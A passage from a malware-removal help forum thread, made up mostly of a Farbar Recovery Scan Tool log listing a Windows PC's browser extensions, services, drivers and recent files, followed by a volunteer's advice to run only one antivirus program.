FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [2011-12-01] ( )
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\User\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll No File
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\User\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2013-10-03] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [2011-12-01] ( )
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\User\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll No File
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\User\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2013-10-03] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [2011-12-01] ( )
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [2011-12-01] ( )
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1006-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [2011-12-01] ( )
FF user.js: detected! => C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\73ou9irr.default-1393877900780\user.js [2015-02-12]
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npBitCometAgent.dll [2010-02-21] (BitComet)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2013-05-11] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2014-10-21] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2014-10-21] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2014-10-21] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2014-10-21] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2014-10-21] (Apple Inc.)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\adawaretb.xml [2014-01-18]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\wtu-secure-search.xml [2014-09-03]
FF Extension: Adblock Plus - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\73ou9irr.default-1393877900780\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-09-08]
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2012-05-08]
FF HKLM-x32\...\Firefox\Extensions: [{FFB96CC1-7EB3-449D-B827-DB661701C6BB}] - C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker
FF HKLM-x32\...\Firefox\Extensions: [ext@flash-Enhancer.com] - C:\Program Files (x86)\AmiExt\flashEnhancer\ff
FF HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3

Chrome:
=======
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (AdBlock) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-03-23]
CHR Extension: (Bookmark Manager) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-05-24]
CHR Extension: (Flamite) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\kgobopgcnapcnblkpelgjjblnjjpgejk [2015-05-24]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-12]
CHR Extension: (Google Wallet) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-03-23]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gaiilaahiahdejapggenmdmafpmbipje] - C:\Program Files (x86)\DealPly\DealPly.crx [Not Found]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kdfbddbdpnahdahmamlolacimfdbeckk] - C:\Users\User\AppData\Local\CRE\kdfbddbdpnahdahmamlolacimfdbeckk.crx [2013-04-10]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [klibnahbojhkanfgaglnlalfkgpcppfi] - C:\Users\User\AppData\Local\CRE\klibnahbojhkanfgaglnlalfkgpcppfi.crx [2013-04-18]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lalblocoaegmicimmklamjmfpdmpenaf] - C:\Users\User\AppData\Local\CRE\lalblocoaegmicimmklamjmfpdmpenaf.crx [Not Found]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gaiilaahiahdejapggenmdmafpmbipje] - C:\Program Files (x86)\DealPly\DealPly.crx [Not Found]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kdfbddbdpnahdahmamlolacimfdbeckk] - C:\Users\User\AppData\Local\CRE\kdfbddbdpnahdahmamlolacimfdbeckk.crx [2013-04-10]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [klibnahbojhkanfgaglnlalfkgpcppfi] - C:\Users\User\AppData\Local\CRE\klibnahbojhkanfgaglnlalfkgpcppfi.crx [2013-04-18]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lalblocoaegmicimmklamjmfpdmpenaf] - C:\Users\User\AppData\Local\CRE\lalblocoaegmicimmklamjmfpdmpenaf.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [didepmgifgpiahohnelodedkglcldncm] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha8285\ch\MediaViewV1alpha8285.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [dkpgpalmlhhcakipgodbonbgjjdmbjnl] - C:\Program Files (x86)\MediaViewerV1\MediaViewerV1alpha1423\ch\MediaViewerV1alpha1423.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [fcbpkmeonnhlhobiihbochcmiioicaca] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha3658\ch\MediaViewV1alpha3658.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [gaiilaahiahdejapggenmdmafpmbipje] - C:\Program Files (x86)\DealPly\DealPly.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [hnghlghflihkfiopikcjmaiajgbieegb] - C:\Program Files (x86)\VideoPlayerV3\VideoPlayerV3beta573\ch\VideoPlayerV3beta573.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [kdfbddbdpnahdahmamlolacimfdbeckk] - C:\Users\User\AppData\Local\CRE\kdfbddbdpnahdahmamlolacimfdbeckk.crx [2013-04-10]
CHR HKLM-x32\...\Chrome\Extension: [klibnahbojhkanfgaglnlalfkgpcppfi] - C:\Users\User\AppData\Local\CRE\klibnahbojhkanfgaglnlalfkgpcppfi.crx [2013-04-18]
CHR HKLM-x32\...\Chrome\Extension: [lalblocoaegmicimmklamjmfpdmpenaf] - C:\Users\User\AppData\Local\CRE\lalblocoaegmicimmklamjmfpdmpenaf.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [oejkcgajlodefenbbjdnaiahmbnnoole] - C:\Program Files (x86)\Lavasoft\AdAware SecureSearch Toolbar\chrome-newtab-search.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [pldkcbogceafpgblcfljhbbkkjindpcj] - C:\Program Files (x86)\MediaWatchV1\MediaWatchV1home140\ch\MediaWatchV1home140.crx [Not Found]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ABBYY.Licensing.FineReader.Sprint.9.0; C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [759048 2009-05-14] (ABBYY)
S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2013-06-11] (Adobe Systems) [File not signed]
R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1526936 2015-06-16] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3461072 2015-06-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [312816 2015-06-16] (AVG Technologies CZ, s.r.o.)
S3 fussvc; C:\Program Files (x86)\Windows Kits\8.0\App Certification Kit\fussvc.exe [139776 2012-07-25] (Microsoft Corporation) [File not signed]
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1152656 2015-06-03] (NVIDIA Corporation)
R3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [249344 2009-09-20] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-09-20] (Hewlett-Packard Co.) [File not signed]
R2 LavasoftAdAwareService11; C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe [706864 2014-06-03] ()
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-04-14] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-04-14] (Malwarebytes Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [File not signed]
R2 Norton PC Checkup Application Launcher; C:\Program Files (x86)\Norton PC Checkup 3.0\SymcPCCULaunchSvc.exe [132504 2013-03-17] (Symantec Corporation)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [4063280 2011-06-07] (INCA Internet Co., Ltd.) [File not signed]
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1893008 2015-06-03] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [23007376 2015-06-03] (NVIDIA Corporation)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.12.27\ccSvcHst.exe [126392 2011-05-03] (Symantec Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [File not signed]
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2013-04-20] ()
S3 Te.Service; C:\Program Files (x86)\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe [126976 2012-07-25] (Microsoft Corporation) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S3 WPDBusEnum; C:\Windows\system32\wpdbusenum.dll [117248 2010-11-20] (Microsoft Corporation) [File not signed]
S3 xsherlock; C:\Windows\SysWOW64\xsherlock.xem [674912 2012-09-01] (Wellbia.com Co., Ltd.) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13368 2009-04-06] ()
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [67552 2015-04-14] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [287200 2015-05-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [253408 2015-05-12] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [256992 2015-04-15] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [224224 2015-05-12] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [281568 2015-05-12] (AVG Technologies CZ, s.r.o.)
S3 dump_wmimmc; No ImagePath
S3 hwmobile; C:\Windows\System32\DRIVERS\hwusbser.sys [122496 2010-08-19] (HUAWEI Incorporated)
S3 LVPr2M64; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30304 2010-05-07] ()
S3 LVPr2Mon; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30304 2010-05-07] ()
S3 MAUSBFASTTRACKULTRA; C:\Windows\System32\DRIVERS\MAudioFastTrackUltra.sys [197424 2011-01-11] (Avid Technology, Inc.)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-04-14] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [136408 2015-06-28] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-04-14] (Malwarebytes Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [15416 2009-07-15] ()
S3 NPPTNT2; C:\Windows\SysWOW64\npptNT2.sys [4682 2004-12-30] (INCA Internet Co., Ltd.) [File not signed]
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2015-06-03] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [46768 2015-05-18] (NVIDIA Corporation)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [28416 2008-04-16] (Research In Motion Limited)
S1 SCDEmu; No ImagePath
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [386680 2014-06-19] (Duplex Secure Ltd.)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2014-03-03] ()
S3 Synth3dVsc; No ImagePath
S3 TesSafe; C:\Windows\system32\TesSafe.sys [969696 2014-04-27] (TENCENT)
S3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [389240 2014-04-22] (BitDefender S.R.L.)
S3 tsusbhub; No ImagePath
S3 VGPU; No ImagePath
S3 vtany; No ImagePath
S3 X6va005; No ImagePath
S3 X6va012; No ImagePath
U3 az2rivpn; No ImagePath
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-06-28 11:38 - 2015-06-28 11:38 - 00036844 _____ C:\Users\User\Downloads\FRST.txt
2015-06-28 11:37 - 2015-06-28 11:38 - 00000000 ____D C:\FRST
2015-06-28 11:36 - 2015-06-28 11:37 - 02112512 _____ (Farbar) C:\Users\User\Downloads\FRST64.exe
2015-06-28 11:36 - 2015-06-28 11:36 - 01636352 _____ (Farbar) C:\Users\User\Downloads\FRST(1).exe
2015-06-28 11:35 - 2015-06-28 11:35 - 01636352 _____ (Farbar) C:\Users\User\Downloads\FRST.exe
2015-06-28 09:26 - 2015-06-28 09:26 - 00001106 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-06-28 09:26 - 2015-06-28 09:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-06-28 09:26 - 2015-06-28 09:26 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-06-28 09:26 - 2015-04-14 09:37 - 00107736 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-06-28 09:26 - 2015-04-14 09:37 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-06-28 09:26 - 2015-04-14 09:37 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-06-28 09:24 - 2015-06-28 09:24 - 21546080 _____ (Malwarebytes Corporation ) C:\Users\User\Downloads\mbam-setup-2.1.6.1022.exe
2015-06-28 09:22 - 2015-06-28 09:22 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\User\Downloads\revosetup.exe
2015-06-28 09:22 - 2015-06-28 09:22 - 00001268 _____ C:\Users\User\Desktop\Revo Uninstaller.lnk
2015-06-28 09:22 - 2015-06-28 09:22 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2015-06-27 23:22 - 2015-06-28 08:01 - 00000338 _____ C:\Users\User\Desktop\avgrep.txt
2015-06-27 21:14 - 2015-06-28 11:09 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2015-06-27 21:14 - 2015-06-27 21:14 - 00002864 _____ C:\Windows\System32\Tasks\ybzhzak
2015-06-23 11:19 - 2015-06-23 11:23 - 00008561 _____ C:\Users\User\Documents\dfo security code dnf.odt
2015-06-22 12:57 - 2015-06-22 12:57 - 00000000 ____D C:\Program Files\Common Files\AV
2015-06-21 16:55 - 2015-06-21 16:55 - 45113344 _____ C:\Users\User\Downloads\AdbeRdrUpd11010.msp
2015-06-20 09:04 - 2015-06-20 09:04 - 00008748 _____ C:\Users\User\Documents\Dwayne algonquin OAN.odt
2015-06-20 06:29 - 2015-05-18 23:29 - 00046768 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2015-06-20 06:29 - 2015-05-18 23:14 - 00057520 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2015-06-20 06:25 - 2015-06-20 06:29 - 00000000 ____D C:\ProgramData\Oracle
2015-06-19 10:51 - 2015-06-24 05:49 - 00000000 ____D C:\Users\User\Documents\Candis Cones
2015-06-15 20:05 - 2015-06-15 20:05 - 00000000 ____D C:\Users\User\AppData\Local\{8E71BBF1-8D31-4DFB-97BD-38E551B177FF}
2015-06-12 17:12 - 2015-06-12 23:15 - 00066333 _____ C:\Users\User\Documents\exercise science ufc.odt
2015-06-10 10:17 - 2015-05-25 13:08 - 03206144 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-06-10 10:17 - 2015-05-08 23:27 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2015-06-10 10:17 - 2015-05-08 23:27 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2015-06-10 10:17 - 2015-05-08 23:27 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2015-06-10 10:17 - 2015-05-08 23:27 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2015-06-10 10:17 - 2015-05-08 23:26 - 01162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2015-06-10 10:17 - 2015-05-08 23:26 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2015-06-10 10:17 - 2015-05-08 23:26 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2015-06-10 10:17 - 2015-05-08 23:25 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2015-06-10 10:17 - 2015-05-08 23:20 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:13 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2015-06-10 10:17 - 2015-05-08 23:13 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)


==================== Files in the root of some directories =======

2014-04-18 10:46 - 2014-09-03 18:27 - 0000000 _____ () C:\Program Files (x86)\Mozilla Firefoxwtu-secure-search.xml
2013-12-18 22:38 - 2014-03-29 00:23 - 0000121 _____ () C:\Users\User\AppData\Roaming\WB.CFG
2013-06-08 23:23 - 2015-06-22 17:09 - 0038400 _____ () C:\Users\User\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-05-16 14:24 - 2014-05-16 14:24 - 0607664 _____ (Neople inc) C:\Users\User\AppData\Local\DFOIns.exe
2014-05-16 14:22 - 2014-05-16 14:22 - 0477104 _____ (Neople inc) C:\Users\User\AppData\Local\NeopleCustomURLStarter.exe
2014-04-27 20:53 - 2014-04-27 20:53 - 0000040 _____ () C:\ProgramData\DT0001.dat
2014-04-27 20:52 - 2014-04-27 20:52 - 0000040 _____ () C:\ProgramData\DT0006.dat
2012-05-08 10:29 - 2013-06-20 00:43 - 0002302 _____ () C:\ProgramData\hpzinstall.log
2013-10-13 21:27 - 2013-10-13 21:27 - 0004096 _____ () C:\ProgramData\tbythlfa.ktx
2013-10-13 19:45 - 2013-10-13 19:45 - 0004965 _____ () C:\ProgramData\uxxadbmu.rlu

Files to move or delete:
====================
C:\ProgramData\DT0001.dat
C:\ProgramData\DT0006.dat


Some files in TEMP:
====================


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-06-24 06:48

 



#5 deeprybka


Posted 28 June 2015 - 11:05 AM

Multiple Anti-Virus Software

I see that you're running more than one antivirus program at the same time.
This is a bad idea.
Using more than one AV will not give you any better protection, but may cause interference between them, slow your machine or even completely block your OS. You should choose only one to stay, and remove any others. (Malwarebytes Antimalware isn't an Antivirus!) Think carefully and stay with only one AV. It should be done before any other steps in malware removal are taken.

